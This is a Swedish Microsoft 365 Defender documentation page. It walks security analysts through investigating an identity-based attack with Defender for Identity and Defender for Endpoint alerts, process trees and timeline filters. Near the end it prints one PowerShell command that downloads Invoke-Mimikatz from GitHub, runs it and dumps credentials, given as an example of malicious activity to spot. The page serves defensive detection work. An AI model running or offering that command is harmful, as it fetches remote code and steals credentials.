Exempel på en identitetsbaserad attack
Viktigt
Den förbättrade Microsoft 365 Defender-portalen är nu tillgänglig. Med den här nya upplevelsen kommer Defender för Endpoint, Defender för Office 365, 365 Microsoft 365 Defender och annat till Microsoft Defender for Cloud Apps. Läs om de senaste.
Gäller för:
- Microsoft 365 Defender
Microsoft Defender för identitet kan hjälpa till att identifiera skadliga försök att avslöja identiteter i organisationen. Eftersom Defender för identitet är integrerat med Microsoft 365 Defender kan säkerhetsanalytiker se hot som kommer in från Defender för identitet, till exempel misstänkta Netlogon-försök till höjd på behörigheter.
Analysera attacken i Microsoft Defender för identitet
Microsoft 365 Defender analytiker kan filtrera aviseringar genom identifieringskälla på fliken Aviseringar på sidan incidenter. I följande exempel filtreras identifieringskällan till Defender för identitet.
Om du väljer den misstänkta overpass-the-hash-attackvarningen går du till en sida i Microsoft Cloud App Security som visar mer detaljerad information. Du kan alltid ta reda på mer om en avisering eller attack genom att välja Läs mer om den här aviseringstypen för att läsa en beskrivning av attacken samt åtgärdsförslag.
Undersöker samma attack i Microsoft Defender för Endpoint
En analytiker kan också använda Defender för Endpoint om du vill veta mer om aktiviteten på en slutpunkt. Välj incidenten i incidentkön och välj sedan fliken Aviseringar. Härifrån kan de även identifiera identifieringskällan. En identifieringskälla som heter Identifiering och åtgärd på slutpunkt det här kallas slutpunktsidentifiering och -svar, som är Defender för Slutpunkt. Härifrån väljer analytikern en avisering som identifieras av Identifiering och åtgärd på slutpunkt.
På aviseringssidan visas olika relevant information, till exempel den påverkade enhetens namn, användarnamn, status för automatisk undersökning och aviseringsinformationen. I varningsartikeln visas en visuell representation av processträdet. Processträdet är en hierarkisk representation av överordnade och underordnade processer som är relaterade till aviseringen.
Varje process kan utökas för att visa ytterligare information. Information som en analytiker kan se är de faktiska kommandon som har angetts som en del av ett skadligt skript, utgående anslutnings-IP-adresser och annan användbar information.
Genom att välja Visa på tidslinjen kan en analytiker granska nedåt ytterligare för att fastställa den exakta tiden för kompromissen.
Microsoft Defender för Endpoint kan identifiera många skadliga filer och skript. På grund av många legitima användningsområden för utgående anslutningar, PowerShell och kommandoradsaktivitet anses dock en del aktivitet vara aktiv tills den skapar en skadlig fil eller aktivitet. Därför hjälper användning av tidslinjen analytiker att sätta aviseringen i sammanhanget med den omgivande aktiviteten för att fastställa den ursprungliga källan eller tiden för attacken som annars döljs av vanliga filsystem och användaraktivitet.
För att göra detta skulle en analytiker börja vid tiden för aviseringsidentifiering (i rött) och rulla nedåt bakåt i tiden för att avgöra när den ursprungliga aktiviteten som ledde till den skadliga aktiviteten faktiskt startade.
Det är viktigt att förstå och urskilja vanlig aktivitet, till exempel Windows Uppdatera anslutningar, Windows aktiveringstrafik med betrodd programvara, andra vanliga anslutningar till Microsoft-webbplatser, Internetaktivitet från tredje part, Microsoft Endpoint Configuration Manager-aktivitet och annan aktivitet i misstänkt programvara från misstänkt aktivitet. Ett sätt att uppnå det här är att använda tidslinjefilter. Det finns många filter som kan markera viss aktivitet när du filtrerar bort något som analytikern inte vill visa.
I bilden nedan har analytikern filtrerats för att endast visa nätverks- och processhändelser. Då kan analytikern se nätverksanslutningar och processer kring händelsen där Anteckningar upprättat en anslutning med en IP-adress, vilket vi också såg i processträdet.
I den här händelsen Anteckningar en skadlig utgående anslutning. Men ofta används bara iexplorer.exe för att upprätta anslutningar för att ladda ned en skadlig nyttolast eftersom iexplorer.exe vanligtvis betraktas som vanlig webbläsaraktivitet.
Ett annat objekt att leta efter på tidslinjen skulle vara PowerShell-användningar för utgående anslutningar. Analytikern letar efter lyckade PowerShell-anslutningar med kommandon som följt av en utgående anslutning till IEX (New-Object Net.Webclient) en webbplats som är värd för en skadlig fil.
I följande exempel användes PowerShell till att ladda ned och köra Mimikatz från en webbplats:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
En analytiker kan snabbt söka efter nyckelord genom att skriva in nyckelordet i sökfältet för att endast visa händelser som skapats med PowerShell.
Nästa steg
Se sökvägen till nätfiskeundersökningen.